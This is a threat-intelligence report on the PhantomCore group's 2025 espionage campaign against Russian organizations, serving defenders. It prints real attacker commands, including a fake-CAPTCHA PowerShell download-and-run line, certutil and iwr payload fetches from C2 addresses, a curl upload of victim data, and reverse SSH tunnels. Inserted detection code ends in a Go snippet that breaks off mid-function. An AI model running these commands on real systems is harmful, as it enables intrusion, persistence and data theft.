PT Expert Security Center

Phantom pains: a large-scale cyberespionage campaign and a possible split within the PhantomCore APT group

Authors:

Viktor Kazakov

Lead Cyberthreat Intelligence Specialist, Positive Technologies Expert Security Center

Key takeaways

Key characteristics of the PhantomCore activity:

  • Extensive malware toolkit: from widely used open-source utilities favored by cybercriminals and updated versions of known in-house tools to previously unseen, custom-built samples
  • Segmented infrastructure and tools: a compromised Russian site, a phishing site with a fake CAPTCHA, payload staging servers, MeshCentral servers, SSH tunnels, and a Phantom control panel
  • Scale and intensity of cyberattacks: from May to July, more than 180 hosts at Russian organizations in critical economic sectors and government were infected
  • Signs of an internal split, with Russian citizens involved in a new offshoot

Introduction

PhantomCore first came to light in early 2024. Over the past year and a half, the group has significantly expanded its offensive arsenal with custom-developed tools and has carried out numerous espionage-focused attacks against Russian critical infrastructure.

Expertise built by the PT ESC's Threat Intelligence team through in-depth tracking of the group, together with internal cyber intelligence systems, enabled rapid detection of PhantomCore activity despite the evolution of its malware. As a result, in early May of this year we identified a new, large-scale cyberespionage campaign targeting Russian organizations.

We mapped the group's key infrastructure, analyzed its updated toolkit, including previously unknown in-house samples, documented the TTPs and attack kill chain, identified victim organizations in Russia whose corporate networks were compromised, and prevented non-tolerable events.

Cyberattack detection

In early May, PT ESC's Threat Intelligence team detected several UPX-packed RAT samples delivered by email as ZIP archives, some of them password-protected, named "Документы_на_рассмотрение" ("Documents for review").

Executing the encapsulated LNK file opened a PDF lure and silently extracted, installed, and launched an updated PhantomRAT backdoor controlled from the C2 server at 195.58.54[.]39.

UPX-packed PhantomRAT backdoor
Contents of the LNK file
PDF lure

The associated threat intelligence, enriched with verdicts from Positive Technologies products, was promptly added to the PT Threat Intelligence Portal knowledge base.

PT ESC verdicts on the PhantomRAT backdoor, 2025

Further analysis of the PhantomCore activity enabled the PT ESC's Threat Intelligence team to fully expose the cyberespionage campaign, quickly feed the intelligence into Positive Technologies products to prevent incidents in client networks, and notify other organizations of compromise.

Network infrastructure analysis

The PhantomCore network infrastructure is strictly segmented by function and by the classes of cyberespionage tools (a detailed breakdown of tools follows in the next section).

PhantomCore network infrastructure

1.    C2 server of the PhantomRAT backdoor

Used at the Initial Access stage (the first cyberattack stage). Collects basic information about the compromised system and sends commands to infected hosts to download the following payloads from payload staging servers and run them: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.

Detected URL routes:

  • /connect: establish connection
  • /init: send infected host information
  • /check: connection check
  • /command: receive a command for execution on the infected host
  • /out: return command execution results
URL routes of the PhantomRAT C2 server

Detected server:

195.58.54.39


2.    C2 servers of the PhantomRShell backdoor

Used at the Initial Access stage. Functionality mirrors the PhantomRAT C2 server: receiving basic information about the compromised system and sending commands to infected hosts to download the following payloads from payload staging servers and run them: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.

Detected URL routes:

  • /poll: send infected host information and receive a command
  • /result: send command execution results
URL routes of the PhantomRShell C2 server

Detected servers:

188.127.254.44
91.239.148.21
185.225.17.104


3.    Payload staging servers

Used at subsequent stages of the cyberattack to host the following tools and deliver them to infected hosts:

  • PhantomTaskShell backdoor
  • PhantomProxyLite backdoor
  • PhantomStealer infostealer
  • MeshAgent utility
  • RSocx utility
  • RClone utility
  • XenArmor All-In-One Password Recovery Pro utility

The threat intelligence team identified several PhantomCore payload staging servers:

  • Compromised site

Used during the Persistence and Defense Evasion stages to host PhantomTaskShell, MeshAgent, and RSocx, which operators of the PhantomRAT and PhantomRShell backdoors load onto infected hosts via a direct URL:
 

up https://<redacted>/inetpub.zip C:\ProgramData\inetpub.zip

up https://<redacted>/update.zip C:\ProgramData\update.zip

up https://<redacted>/hosts.zip C:\ProgramData\hosts.zip
Downloading the PhantomTaskShell backdoor from a compromised site into PT Sandbox
Behavioral analysis of the PhantomTaskShell backdoor in PT Sandbox
Behavioral analysis of a MeshAgent sample in PT Sandbox
  • VPS hub

A VPS server running Ubuntu with SSH enabled; ports 80 (HTTP) and 443 (HTTPS) toggle from closed to open. According to the threat intelligence team, they're typically opened at the start of the workday, when the group pushes payload to infected hosts.

VPS hub network profile

Used at the Credential Access stage to host PhantomStealer and the XenArmor All-In-One Password Recovery Pro utility and to deliver them to infected hosts via the PhantomTaskShell backdoor using direct URLs:

iwr -Uri "http://188.127.254.234:80/browser.zip" -OutFile "C:\ProgramData\browser.zip"

certutil.exe -urlcache -f http://188.127.254.234/one.zip C:\\ProgramData\\one.zip


Detected server:

188.127.254.234
  • Phishing site

Registered on the eve of the identified cyberespionage campaign, in April of this year, using the data of a Russian citizen and the email address iseh34228@proton[.]me.

WHOIS data for the phishing domain

The site uses the original HTML layout of the official site of the Moscow City Compulsory Medical Insurance Fund and prompts visitors, under the pretext of a fake CAPTCHA challenge, to paste and execute clipboard contents in the Windows command-line interpreter.
 

powershell -WindowStyle Hidden -Command "& {iwr 'https://mgfoms.org/in.php?action=2' -OutFile '%userprofile%\dnsclient.exe'; Start-Process '%userprofile%\dnsclient.exe' -ArgumentList 'run' -WindowStyle Hidden}"

Phishing site with a fake CAPTCHA

Executing the command downloads and covertly launches a MeshAgent instance controlled by the same MeshCentral server at the austolns[.]pw domain as the MeshAgent instance downloaded from the compromised site described above.

MeshAgent instance configuration

Detected phishing site
 

mgfoms.org


4.    PhantomTaskShell C2 servers with the Phantom control panel

VPS servers running Ubuntu with SSH enabled and port 80 (HTTP) open, hosting the Phantom control panel with a web interface for administrator authentication.

Phantom control panel

The servers are used at all cyberattack stages after Initial Access to manage infected hosts via the PhantomTaskShell backdoor. They expose an external API to receive commands for execution in the victim's PowerShell and to return results.

Detected URL routes:

  • /login: authentication
  • /api/clients/: register infected host
  • /api/clients/<GUID>/commands: receive commands

The favicon is an image alluding to the PhantomCore name, actually a copy of the first letter from the stylized title of a popular computer game, created from a PNG stencil circulating in the gaming community.

Phantom control panel favicon
Original PNG stencil
Official game landing page

These unique network fingerprints allowed us to spot newly deployed servers running the Phantom control panel, confirm their linkage through shared C2 infrastructure (payload staging servers, proxy servers, aggregators of information about infected hosts), significantly broaden our view of the cyberattack footprint and victims, and feed the resulting intelligence into Positive Technologies products.

Threat intelligence data on the Phantom control panel server in the PT Threat Intelligence Portal

5.    MeshAgent C2 servers

VPS servers running Ubuntu with MeshCentral (a remote device management platform) installed, as evidenced by TLS certificates on open port 443 (HTTPS).

Network profile of the MeshCentral server with a TLS certificate for austolns[.]pw
TLS certificate for the MeshCentral server with the austolns[.]pw domain

Used during the Persistence stage to receive data on infected hosts and control them via MeshAgent instances deployed by PhantomRAT and PhantomRShell operators from compromised or phishing sites.

PhantomCore applies a full set of measures to disguise its MeshCentral servers as legitimate IT infrastructure:

  • Web authentication pages mimicking corporate Mattermost and Nextcloud services
MeshCentral server web interface mimicking Mattermost
MeshCentral server web interface mimicking Nextcloud
  • MeshCentral server domains mimicking IT and cybersecurity brands

The MeshCentral servers detected by the threat intelligence team use domains themed around cybersecurity and software development:

nextcloud.soft-trust.com
nextcloud.1cbit.dev
nextcloud.trust-sec.it.com
softline-solutions.cloud


Several domains were registered with the real data of a Russian citizen and the email address emilygrace1981@proton[.]me, which is linked to other PhantomCore IT mimicry domains:

  • Impersonation of real Russian IT companies

On port 81 (HTTP), the MeshCentral servers host a landing page with HTML copied from official sites of Russian IT companies.

Impersonation of a Russian IT integrator

Identified MeshCentral domains and servers:



6.    Proxy servers of PhantomProxyLite, RSocx, and SSH tunnels

VPS servers running Ubuntu with ports 80 (HTTP), 443 (HTTPS), and 8080 (HTTP) open, with SSH enabled. They are used during the Persistence, Defense Evasion, and Command and Control stages to create a reverse SSH tunnel into a victim's internal network, masquerading as legitimate HTTPS traffic.

Proxy server network profile

Commands that launch the SSH tunnel, executed on infected hosts via the PhantomTaskShell backdoor and the Windows Task Scheduler:

ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37581 -p 443 cfyvg84df17842o@185.130.251.227

schtasks /create /sc DAILY /tn SSH /tr \\"C:\\Windows\\system32\\OpenSSH\\ssh.exe -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 52213 -p 443 cfyvg84df17842o@185.130.251.227\\" /f /st 09:00


SSH sessions on infected hosts are controlled via a control panel operating on network port 80 of the tunneling servers.

Control panel on a server with an SSH tunnel

The proxy servers are also used during the Collection and Exfiltration stages as a hub for the RClone utility and the configuration file, which are loaded to infected hosts from the server's 8080 network port using the following commands:

certutil.exe -urlcache -f "http://195.133.32.213:8000/srvhost.exe" "C:\ProgramData\srvhost.exe"

certutil.exe -urlcache -f http://195.133.32.213:8000/wusa.conf C:\ProgramData\wusa.conf


Detected servers:



7.    Aggregators collecting information on infected hosts

VPS servers running Ubuntu with port 80 (HTTP) open, hosting the backend that collects data on infected hosts. Used during the Discovery stage.

Detected URL routes:

  • /upload: uploading information about the infected host
Network profile of the aggregator server

Command to send infected host information, executed in the Windows command interpreter using the PhantomTaskShell backdoor:

C:\\Windows\\System32\\curl.exe -v -F "file=@C:\\ProgramData\\user_report.txt" -F "destinationPath=./user_report.txt" http://185.130.249.224:80/upload'


Detected server:

185.130.249.224


PhantomCore's malicious infrastructure is notable in that nearly half (48%) of its servers are located in Russia, primarily within the networks of three Russian hosting providers:

  • LLC Smart Ape: AS56694 (28%)
  • Mt Finance LLC: AS214822 (14%)
  • First Server Limited: AS204997 (5%)

19% of the Russian infrastructure cluster resides in the 185.130.248.0/22 subnet. The remaining 52% is hosted abroad, distributed fairly evenly across Finland (9%), France (9%), the Netherlands (9%), the U.S. (5%), Germany (5%), Hong Kong (5%), Moldova (5%), and Poland (5%). Notably, 33% of the entire infrastructure is concentrated on the networks of the Canadian provider CGI Global Limited.

PhantomCore network infrastructure in the PT Threat Intelligence Portal

Analysis of tools

1.    PhantomRAT

PhantomRAT is a backdoor written in Go and delivered as a PE executable in the first phase of the cyberattack to gain initial access and download the following payloads: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.

The backdoor does not use persistence techniques on the infected host.

  • Defense Evasion

To detect debugging, virtualization, and analysis tools, PhantomRAT calls the WinAPI function IsDebuggerPresent() and checks the Windows registry keys DriverDesc and SYSTEM\ControlSet001\Services\Disk for the string "vmware".

  • Discovery

PhantomRAT collects the following information on the infected host:

Parameter: description; collection method

  • host: host name; calling the Go function os.Hostname()
  • user: username; reading the USERNAME environment variable via the Go function os.Getenv()
  • domain: domain; reading the USERDOMAIN environment variable via the Go function os.Getenv()
  • local_ip: host IP address on the local network; calling the Go function net.InterfaceAddrs()
  • public_ip: host external IP address; sending a request to the external service https://ident.me

  • Command and Control

PhantomRAT checks connectivity to the C2 server:

GET /connect


and sends JSON with host details:
 

POST /init
JSON with information about the infected system

Next, PhantomRAT regularly polls the C2 server for commands to execute on the compromised host:

POST /command


The C2 server replies with JSON containing a Response field, which includes the command type (cmd_id) and the command data (cmd_data) to execute on the host.

JSON with information about the command

The command-type parameter (cmd_id) can take several values:

Command: purpose

  • Up: download a file from a remote host to the hardcoded directory C:\ProgramData\
  • Ex: run the command passed in cmd_data in the Windows command-line interpreter as cmd /s /c "<cmd_data> | cmd"
  • St: run a process on the infected host (for example, a previously downloaded file): cmd.exe /C start "<cmd_data>"

PhantomRAT sends command execution results in a similarly structured JSON object:
 

POST /out
JSON object with the command execution results

The PhantomRAT code also includes a function that checks the connection with the C2 server:

POST /check


However, regardless of the outcome, the backdoor doesn't perform any action. This looks like a test function and is likely still under development.

Detected samples:



Key characteristics:

  • PE executable written in Go
  • No persistence techniques
  • Uses defense evasion techniques
  • Collects a broad range of host information
  • Supports multiple action types on the compromised host
  • No encryption for data being transferred
  • Hardcoded constant: path C:\ProgramData

2.    PhantomRShell

PhantomRShell is a C++ backdoor delivered as a DLL. It is used in the first stage of the cyberattack to gain initial access and download the following payloads: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.

The backdoor does not implement Persistence or Defense Evasion techniques.

  • Discovery

PhantomRShell uses WinAPI functions to collect the following information about the compromised host:

Parameter: description; collection method

  • GUID: identifier; calling the CoCreateGuid() WinAPI function
  • hostname: host name; calling the GetComputerNameW() WinAPI function
  • AD: domain; calling the GetComputerNameExW() WinAPI function

In case of an error, the string UNKNOWN is used as a parameter value.

Next, one of the following working directories is created: C:\ProgramData\YandexCloud or C:\ProgramData\MicrosoftAppStore.

  • Command and Control

In requests to the C2 server, the User-Agent header is set to one of the following:

  • YandexCloud/1.0
  • MicrosoftAppStore/2001.0

PhantomRShell makes three attempts to connect to the C2 server. If all fail, the backdoor sleeps for 10 seconds and retries. Once connected, PhantomRShell transfers host information to the server.

GET /poll?id=<GUID>&hostname=<hostname>&domain=<AD>
User-Agent: YandexCloud/1.0


Next, PhantomRShell receives commands from the C2 server to run on the compromised host, in one of the following formats:

Command: purpose

  • cmd:<cmd_data>|<cmd_ID>: execute the cmd_data command in the Windows command-line interpreter in the form cmd.exe /C <cmd_data>
  • download:<cmd_data>|<cmd_ID>: download a file from a remote host into one of the previously created directories, C:\ProgramData\YandexCloud or C:\ProgramData\MicrosoftAppStore

The command execution results are returned to the C2 as JSON in the result field. When a command to download a file from a remote host is executed, the result field contains either Download successful:<path> or Download failed, depending on whether the download succeeded:
 

POST /result
User-Agent: YandexCloud/1.0
JSON object with the command execution results

Detected samples:



Key characteristics:

  • Dynamic-link library (DLL) written in C++
  • No persistence techniques
  • No defense evasion techniques
  • Supports multiple action types on the compromised host
  • Collects a broad range of host information
  • No encryption for data being transferred
  • Uses specific User-Agent values
  • Hardcoded constant: C:\ProgramData\YandexCloud
  • Hardcoded constant: path C:\ProgramData\MicrosoftAppStore
  • Impersonates software from Russian IT vendors

3.    PhantomTaskShell

PhantomTaskShell is a PowerShell backdoor used at all cyberattack stages after Initial Access to let operators control infected hosts via the Phantom control panel and to download the following payloads: PhantomStealer, OpenSSH, XenArmor All-In-One Password Recovery Pro, and RClone.

On first launch, PhantomTaskShell creates update_id.txt on the infected host and writes in it the GUID value generated via the [System.Guid]::NewGuid() function.

For persistence, a Windows Task Scheduler job named SystemAdminAgent_<GUID>, which runs PhantomTaskShell for 9,999 days regardless of power source (battery or AC), is registered on the infected host. On each run, PhantomTaskShell checks for the update_id.txt file containing the GUID.

If the update_id.txt file is missing (first run), PhantomTaskShell registers the infected host in the Phantom panel by sending the GUID and the hostname (obtained from the COMPUTERNAME environment variable) to the C2 server:
 

POST /api/clients
JSON object with information about the infected host

Next, PhantomTaskShell polls the Phantom control panel every 60 seconds for commands to execute on the infected host.
 

GET /api/clients/GUID/commands
Command request code

The C2 server returns a list where each item starts with "Pending:" followed by the command to run on the infected host.

List of commands obtained from C2
Command execution code on the infected host

PhantomTaskShell sends the command execution results back to the same URL as JSON.

JSON with the command execution results

All PhantomTaskShell actions are logged to update.log on the infected host.

Constants in the PhantomTaskShell code
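As an added illustration (not code from this report or from PT ESC), the following Python detection logic matches web-proxy records against the C2 routes and User-Agent values documented above for PhantomRAT (/connect, /init, /command, /out, /check), PhantomRShell (/poll and /result with the YandexCloud or MicrosoftAppStore User-Agent) and PhantomTaskShell (/api/clients and /api/clients/<GUID>/commands, polled every 60 seconds). The log format, field names and all sample records are constructed; the sample C2 addresses are the ones listed in this report, with documentation-range placeholders (203.0.113.x, 198.51.100.x) where the report gives none.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed log format (an assumption, not from the report):
# "<ISO timestamp> <src ip> <dst ip> <METHOD> <path> <User-Agent>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (GET|POST) (\S+) (.*)$")
GUID = r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
RSHELL_AGENTS = ("YandexCloud/1.0", "MicrosoftAppStore/2001.0")

# Routes and User-Agent values as documented in the report for each backdoor.
# An agent value of None means the report documents no specific User-Agent.
RULES = (
    ("PhantomRAT", "GET", re.compile(r"^/connect$"), None),
    ("PhantomRAT", "POST", re.compile(r"^/(init|command|out|check)$"), None),
    ("PhantomRShell", "GET",
     re.compile(r"^/poll\?id=[^&]+&hostname=[^&]+&domain=[^&]+$"), RSHELL_AGENTS),
    ("PhantomRShell", "POST", re.compile(r"^/result$"), RSHELL_AGENTS),
    ("PhantomTaskShell", "POST", re.compile(r"^/api/clients/?$"), None),
    ("PhantomTaskShell", "GET", re.compile(rf"^/api/clients/{GUID}/commands$"), None),
    ("PhantomTaskShell", "POST", re.compile(rf"^/api/clients/{GUID}/commands$"), None),
)


def classify(method, path, user_agent):
    """Return the backdoor family whose documented route matches, or None.
    Where the report documents a User-Agent, it must match as well, so a
    /poll request from an ordinary client is not flagged on the path alone."""
    for family, rule_method, pattern, agents in RULES:
        if rule_method == method and pattern.match(path):
            if agents is None or user_agent in agents:
                return family
    return None


def parse_line(line):
    """Parse one constructed log line into a dict, or return None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, src, dst, method, path, ua = m.groups()
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
            "method": method, "path": path, "ua": ua}


def find_beacons(lines, min_routes=2):
    """Group matching requests per (src, dst, family) and report sessions that
    touched at least min_routes distinct documented routes. The median gap
    between requests is returned so a ~60 s PhantomTaskShell poll stands out."""
    sessions = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        family = classify(rec["method"], rec["path"], rec["ua"])
        if family:
            sessions[(rec["src"], rec["dst"], family)].append(rec)
    findings = []
    for (src, dst, family), recs in sessions.items():
        routes = {(r["method"], r["path"].split("?", 1)[0]) for r in recs}
        if len(routes) < min_routes:
            continue
        times = sorted(r["ts"] for r in recs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        findings.append({"src": src, "c2": dst, "family": family,
                         "routes": sorted(routes),
                         "median_interval_s": statistics.median(gaps) if gaps else None})
    return findings


# Constructed sample records. User-Agent strings for PhantomRAT and
# PhantomTaskShell are invented, since the report documents none for them.
SAMPLE_LOG = """\
2025-05-12T09:00:00 10.0.0.7 195.58.54.39 GET /connect Go-http-client/1.1
2025-05-12T09:00:01 10.0.0.7 195.58.54.39 POST /init Go-http-client/1.1
2025-05-12T09:00:31 10.0.0.7 195.58.54.39 POST /command Go-http-client/1.1
2025-05-12T09:00:32 10.0.0.7 195.58.54.39 POST /out Go-http-client/1.1
2025-05-12T09:05:00 10.0.0.9 188.127.254.44 GET /poll?id=1b4e28ba-2fa1-11d2-883f-0016d3cca427&hostname=WS-12&domain=CORP YandexCloud/1.0
2025-05-12T09:05:02 10.0.0.9 188.127.254.44 POST /result YandexCloud/1.0
2025-05-12T10:00:00 10.0.0.11 203.0.113.5 GET /api/clients/1b4e28ba-2fa1-11d2-883f-0016d3cca427/commands Mozilla/5.0
2025-05-12T10:01:00 10.0.0.11 203.0.113.5 GET /api/clients/1b4e28ba-2fa1-11d2-883f-0016d3cca427/commands Mozilla/5.0
2025-05-12T10:02:00 10.0.0.11 203.0.113.5 GET /api/clients/1b4e28ba-2fa1-11d2-883f-0016d3cca427/commands Mozilla/5.0
2025-05-12T10:02:01 10.0.0.11 203.0.113.5 POST /api/clients/1b4e28ba-2fa1-11d2-883f-0016d3cca427/commands Mozilla/5.0
2025-05-12T10:03:00 10.0.0.12 198.51.100.4 GET /api/status Mozilla/5.0
2025-05-12T10:03:05 10.0.0.13 203.0.113.8 GET /poll?id=x&hostname=y&domain=z curl/8.0
2025-05-12T10:04:00 10.0.0.20 195.58.54.39 GET /connect Go-http-client/1.1
"""

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG.splitlines()):
        print(finding)
```

A single /connect hit (the last sample line) is not reported on its own, and the /poll request with a non-matching User-Agent is ignored, which keeps the rule from firing on ordinary traffic that happens to use the same path.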

Detected sample:

9f9acdd833f3fd7b8bf987a8cc17e9456546fdcbcfe80c3b0dfc57c6f62d3e4b


4.    PhantomStealer

PhantomStealer is an infostealer written in Go and used during the Credential Access stage. It targets authentication data saved in Yandex Browser, Google Chrome, and Discord. Although it is not an open-source utility, it includes usage instructions.

Infostealer usage instruction

Run settings:

  • program: software to process (Yandex Browser, Google Chrome, or Discord).

Modes of use:

  • -c: export authentication data
  • -d: import authentication data

In export mode, the infostealer extracts, decrypts, and saves authentication data for each supported software to separate files, then packages them into a single ZIP archive:

  • Yandex Browser: yandex-udak64.dat
  • Google Chrome: chromecc16.dat
  • Discord: discord-key.dat

The import function, which is unusual for infostealers, likely helps PhantomStealer operators work with the stolen accounts later.

Detected sample:

c3d05d7d6e1c50c6bd493fd5613c3204e6beadf8b6e4915cdf2f899fabf86a4e


5.    PhantomProxyLite

PhantomProxyLite is used at the Persistence and Defense Evasion stages. It sets up an SSH tunnel between the compromised host and the C2 server to maintain reliable access to the victim network.

PhantomProxyLite runs as a background service named SSHService. On first launch, it generates a random reverse port number for the C2 server (greater than 12559), stores it in the Windows registry at HKLM\SOFTWARE\SSHService, and reads it back on each subsequent start. In the C:\Windows\Temp directory, it creates a file named config holding the SSH tunneling parameters for routing network traffic to the C2 server.

Writing configuration parameters to a file

PhantomProxyLite launches ssh.exe on the infected host with settings from the configuration file and the Windows registry, and establishes a reverse SSH tunnel to the proxy server on port 443, disguising malicious traffic as legitimate HTTPS.

Starting the ssh.exe client

Detected samples:

b701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b
2611121e4100b60e8644211bdc831144ba8b772d4d40e616864e7a723a9d7bf8
a2be4d9fdba560a4706ff8c4b32f092ef476f203c96e1b4afaf391cfe82aa533


6.    XenArmor All-In-One Password Recovery Pro

XenArmor All-In-One Password Recovery Pro is a commercial utility for recovering authentication data on Windows operating systems. It is used at the Credential Access stage.

XenArmor official site

PhantomCore purchased the utility via a privileged Gold-status account registered on July 16, 2024 at netu@tuta[.]com.

XenArmor license file

Two purchases were made from this account: on July 16, 2024, the 2023 version of the utility, observed at the start of the analyzed cyberespionage campaign; and on May 13, 2025, an updated version, likely intended for use in future cyberattacks in 2025–2026.

PhantomCore account
Purchase of the utility, 2023
Purchase of the utility, 2025

7.    RClone

RClone is an open-source utility for synchronizing data between a local computer and cloud storage. PhantomCore uses it at the Exfiltration stage to pull data from infected hosts.

The RClone sample identified by the threat intelligence team, downloaded from one of the group's payload staging servers, corresponds to version 1.69.1 of the utility, as confirmed by a hash sum match between the detected sample and the official repository data.

According to the configuration of the detected sample, PhantomCore uses a Mega[.]nz cloud storage account registered to mariaaa228@proton[.]me for data exfiltration.

RClone configuration file

Kill chain, cyberattack TTP

1. Initial Access

Tools:

  • PhantomRAT
  • PhantomRShell

Infrastructure:

195.58.54.39
91.239.148.21
188.127.254.44
185.225.17.104


Backdoors are delivered as polyglot files, using, among other methods, hacked email accounts of legitimate Russian companies.

Malicious email sent from a compromised mailbox carrying a PhantomRShell sample
Detection in the PT Threat Intelligence Portal

2. Persistence, Defense Evasion

Tools:

  • PhantomTaskShell
  • PhantomProxyLite
  • MeshAgent
  • OpenSSH
  • RSocx

Infrastructure:



Procedures:

  • Using PhantomRAT or PhantomRShell, download an archive with a MeshAgent sample from one of the group's payload staging servers, extract it, and create a Windows Task Scheduler task for its daily hidden execution at 10:00 a.m.

Downloading MeshAgent from a VPS server

iwr -Uri "http://188.127.254.234:443/remote.zip" -OutFile "C:\ProgramData\remote.zip"

iwr -Uri "http://188.127.254.234:80/dnsclient.zip" -OutFile "C:\ProgramData\dnsclient.zip"

iwr -Uri http://188.127.254.234:80/inetpub.zip -OutFile C:\ProgramData\inetpub.zip

certutil.exe -urlcache -f http://188.127.254.234:80/remote.zip C:\ProgramData\remote.zip


Downloading MeshAgent from a compromised site

up https://<redacted>/inetpub.zip C:\ProgramData\inetpub.zip


Downloading MeshAgent from a phishing site with a fake CAPTCHA

powershell -WindowStyle Hidden -Command "& {iwr 'https://mgfoms.org/in.php?action=2' -OutFile '%userprofile%\dnsclient.exe'; Start-Process '%userprofile%\dnsclient.exe' -ArgumentList 'run' -WindowStyle Hidden}"


Extracting MeshAgent

expand-archive -force -path C:\ProgramData\inetpub.zip -destinationpath C:\ProgramData\

expand-archive -force -path C:\ProgramData\dnsclient.zip -destinationpath C:\ProgramData\


Creating a task in the Windows Task Scheduler

schtasks /create /sc DAILY /tn \"Microsoft Update\" /tr \"C:\ProgramData\YandexCloud\dnsclient.bat\" /mo 1 /st 10:00

schtasks /create /sc DAILY /tn \"Microsoft Update\" /tr \"C:\ProgramData\YandexCloud\dnsclient.bat\" /st 10:00

schtasks /create /sc DAILY /tn \"Microsoft Update\" /tr \"C:\ProgramData\YandexCloud\dnsclient.bat\" /st 10:01 /f

schtasks /create /sc DAILY /tn \"Yandex Update\" /tr \"powershell -WindowStyle Hidden -Command Start-Process 'C:\ProgramData\inetpub.exe' -ArgumentList 'run' -WindowStyle Hidden\" /mo 1 /st 10:00 /ri 5

schtasks /create /sc DAILY /tn DNS /tr \"powershell -WindowStyle Hidden -Command Start-Process 'C:\ProgramData\dnsclient.exe' -ArgumentList 'run' -WindowStyle Hidden\" /f /st 10:00

schtasks /create /sc DAILY /tn DNS /tr \"powershell -WindowStyle Hidden -Command Start-Process 'C:\ProgramData\inetpub.exe' -ArgumentList 'run' -WindowStyle Hidden\" /f /st 10:00
  • Using PhantomRAT or PhantomRShell, the OpenSSH client is downloaded from the official GitHub repository and installed, a reverse SSH tunnel is set up on port 80 (HTTP) or 443 (HTTPS) with passwordless and keyless authentication, and a Windows Task Scheduler task is created to run it daily at 9:00 a.m.

Downloading and installing the OpenSSH client

msiexec /qn /i https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.8.3.0p2-Preview/OpenSSH-Win64-v9.8.3.0.msi


OpenSSH directory listing

dir "C:\Program Files\OpenSSH"
dir \"C:\Program Files\OpenSSH\"
dir C:\windows\system32\Openssh


Viewing the SSH version

ssh -V


Creating a SSH tunnel

ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37124 -p 80 vtvvuaweuvefafoewfau9124124615@195.133.32.213

ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 31238 -p 443 vtvvuaweuvefafoewfau9124124615@195.133.32.213

ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37581 -p 443 cfyvg84df17842o@185.130.251.227


Creating a task in the Windows Task Scheduler

schtasks /create /sc DAILY /tn SSH /tr \"C:\Windows\system32\OpenSSH\ssh.exe -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 52213 -p 443 cfyvg84df17842o@185.130.251.227\" /f /st 09:00

schtasks /create /sc DAILY /tn Update /tr \"'C:\Windows\system32\OpenSSH\ssh.exe' -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 52127 -p 443 cfyvg84df17842o@185.130.251.227\" /st 09:00
  • Using PhantomRAT or PhantomRShell, download an RSocx sample from a compromised legitimate site, extract it, and run it stealthily; establish a network connection to the C2 server on port 443 (HTTPS) or 8080 (HTTP) over the SOCKS5 protocol:

Downloading RSocx

up https://<redacted>/hosts.zip C:\ProgramData\hosts.zip


Extracting RSocx

powershell expand-archive -force -path "C:\\ProgramData\\hosts.zip" -destinationpath "C:\\ProgramData\\"


Starting RSocx

C:\ProgramData\hosts.exe -r 193.187.174.251:443

C:\ProgramData\hosts.exe -r 195.133.32.213:8080

start /B "" "C:\\ProgramData\\hosts.exe -r 193.187.174.251:443"

Start-Process -FilePath "C:\ProgramData\hosts.exe" -ArgumentList "-r 193.187.174.251:443" -NoNewWindow

Start-Process -FilePath \"C:\ProgramData\hosts.exe\" -ArgumentList \"-r 193.187.174.251:443\" -NoNewWindow
  • Using PhantomRAT or PhantomRShell, a PhantomTaskShell sample is downloaded from a compromised site, extracted, and executed on the infected system:

Downloading PhantomTaskShell

up https://<redacted>/update.zip C:\ProgramData\update.zip


Extracting PhantomTaskShell

expand-archive -force -path C:\ProgramData\update.zip -destinationpath C:\ProgramData\


Starting PhantomTaskShell

powershell C:\ProgramData\MicrosoftAppStore\update.ps1
powershell C:\ProgramData\YandexCloud\update.ps1
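An added example, not taken from the report, of detection logic a defender can run over process-creation command lines for the persistence shown in this section: it unwraps the /tr payload of schtasks /create lines and flags OpenSSH reverse tunnels (-R together with -N) and hidden-window PowerShell launches from C:\ProgramData. The sample lines mirror the observed commands with a constructed placeholder address; the rule names and regular expressions are this example's own.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

var (
	reTaskName = regexp.MustCompile(`(?i)/tn\s+"?([^"\s]+)`)
	reTaskRun  = regexp.MustCompile(`(?i)/tr\s+"([^"]*)"`)
	// ssh flags are case-sensitive: -R <port> (remote forward) plus -N (no command) is the tunnel-only shape seen above
	reSSH      = regexp.MustCompile(`(?i)(^|[\s'"\\])ssh(\.exe)?['"]?\s`)
	reRemoteFw = regexp.MustCompile(`\s-R\s+\d+`)
	reNoCmd    = regexp.MustCompile(`\s-N(\s|$)`)
)

// Classify applies both rules to one process command line. For a schtasks /create
// line it inspects the /tr payload and reports the task name; rules is nil when clean.
func Classify(line string) (rules []string, task string) {
	// logged command lines often carry JSON-escaped quotes (\"), as in the examples above
	cmd := strings.ReplaceAll(line, `\"`, `"`)
	if m := reTaskRun.FindStringSubmatch(cmd); m != nil {
		if t := reTaskName.FindStringSubmatch(cmd); t != nil {
			task = t[1]
		}
		cmd = m[1]
	}
	lower := strings.ToLower(cmd)
	if reSSH.MatchString(cmd) && reRemoteFw.MatchString(cmd) && reNoCmd.MatchString(cmd) {
		rules = append(rules, "reverse_ssh_tunnel")
	}
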